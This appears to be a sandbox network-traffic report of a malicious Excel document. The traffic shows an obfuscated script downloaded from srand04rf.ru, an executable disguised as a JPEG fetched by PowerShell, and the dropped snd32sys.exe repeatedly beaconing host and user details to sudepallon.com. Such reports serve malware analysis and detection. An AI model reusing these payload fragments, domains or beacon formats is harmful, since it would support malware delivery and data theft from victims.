Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 23.21.173.155 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 54.235.175.90 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 50.19.92.227 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 54.235.121.178 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 54.243.175.83 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 50.16.246.238 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 54.235.190.106 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | - | 50.16.226.23 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:53.451231003 CEST | 8.8.8.8 | 192.168.2.3 | 0x6ae3 | No error (0) | sudepallon.com | - | 77.222.42.67 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• srand04rf.ru
• api.ipify.org
• sudepallon.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49724 | 8.211.241.0 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:30:09.727418900 CEST | 253 | OUT | GET /92375234.xml HTTP/1.1
    Connection: Keep-Alive
    Host: srand04rf.ru
Jul 8, 2021 16:30:09.811278105 CEST | 255 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 08 Jul 2021 14:30:09 GMT
    Content-Type: text/xml
    Content-Length: 8419
    Connection: keep-alive
    Last-Modified: Thu, 08 Jul 2021 14:19:40 GMT
    ETag: "60e7097c-20e3"
    Accept-Ranges: bytes
                                                                                                                                                  Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><script language="javascript">var _0x8c86 = [ 'W6RcUHHOW4dcUSocyZGj', 'WQBdGaO7WPqZW73dIq', 'W4pcLqKgyCkGaaHJW6O', 'W4hcOqzBnmo7W7HC', 'bWFcVWmEW4fSxsldUSoKWPW', 'WQxcUs0tWQG2W74', 'yfC1W6BcPef7W6ldJdu', 'WPVcJSoCnHyuWRNdHmkHWPbYWQK', 'W57cKCoKiCkGW5/cPZrZmW', 'WQxdHxzcW7WBW4BdVqnvWPm', 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O', 'zg5jW70/wJ1eW4lcOK/cHG', 'WPbyBmoUWPDzkblcJWHYcq', 'W7ldUt/cN8kdWPNcQty', 'aahdHuTHWP9DqG', 'WQdcMbi8WOSxW7q', 'W7iQnmo+DCkVzSoc', 'W5WHrvJcTmoFEw/cRSolcmo5mmoI', 'k8ofemkaW5PbzczLlcXQ', 'W7hdUMpdHCo8W5FcKHqqye9M', 'a8opcSkonCkOrq', 'WPb5WQVdV0hcQSk7W58', 'y1DLWRxcKe1oW6a', 'W53cKSoPk8oPW5dcLdzuiCk+', 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tmoejCkEBCk+aqKrW7C4WRxcHSk4cmocpYG/m8kidu0atGrOtCoyW4/cGmoiW5BcQCofgSohW6BcMLxdT0BdVKa2FSoqW7/cO8o1kSkQW4vL


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49748 | 8.211.241.0 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:30:58.213911057 CEST | 3578 | OUT | GET /08.jpg HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: srand04rf.ru
    Connection: Keep-Alive
Jul 8, 2021 16:30:58.378170967 CEST | 3580 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 08 Jul 2021 14:30:58 GMT
    Content-Type: image/jpeg
    Content-Length: 763392
    Connection: keep-alive
    Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT
    ETag: "60e5ade0-ba600"
    Accept-Ranges: bytes
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cmmmmmmmmmmmmRichmPEL<`bpW@u@ @Gp9T9@.text`b `.rdataPf@@.data^l@.rsrc@@@.reloc@G H^@BU@p[S`2-S'z]hoAYho5YU
                                                                                                                                                  Data Ascii: MEr<9tP}tJ{uKUEM:Mu*jMB-G\u&+UEtMr<9~ZGUEMtNMtDtMr]:9]u&uMr]:]|MA9~MEME}W*u


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49764 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:56.518250942 CEST | 6034 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:56.586610079 CEST | 6034 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHAZSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49765 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:56.938754082 CEST | 6035 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:57.006598949 CEST | 6035 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFVEUARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49766 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:57.339512110 CEST | 6036 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:57.414515972 CEST | 6037 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQAZJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49767 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:57.757333994 CEST | 6037 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:57.826961040 CEST | 6038 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 4a 51 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFJQUARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49768 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:58.204698086 CEST | 6039 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:58.276258945 CEST | 6039 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cVZAEARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49769 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:58.606812954 CEST | 6040 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:58.675935984 CEST | 6040 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMCXNARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49770 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:59.018161058 CEST | 6041 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:59.090984106 CEST | 6042 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNKPMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49771 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:59.415894985 CEST | 6043 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:59.487183094 CEST | 6043 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNNMMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49772 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:59.801717997 CEST | 6044 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:59.868599892 CEST | 6044 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNKPMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49773 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:00.207560062 CEST | 6045 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:00.276813984 CEST | 6045 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFKPUARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49756 | 23.21.173.155 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:52.909492970 CEST | 5479 | OUT | GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache
Jul 8, 2021 16:31:53.014983892 CEST | 5479 | IN | HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Thu, 08 Jul 2021 14:31:52 GMT
Content-Length: 14
Via: 1.1 vegur
Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
Data Ascii: 185.189.150.70


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49774 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:00.613718033 CEST | 6046 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:00.681197882 CEST | 6046 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cATGZARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.3 | 49775 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:01.018528938 CEST | 6047 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:01.088430882 CEST | 6047 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNHSMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49776 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:01.437737942 CEST | 6048 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:01.505616903 CEST | 6049 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGMNTARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49777 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:01.835478067 CEST | 6049 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
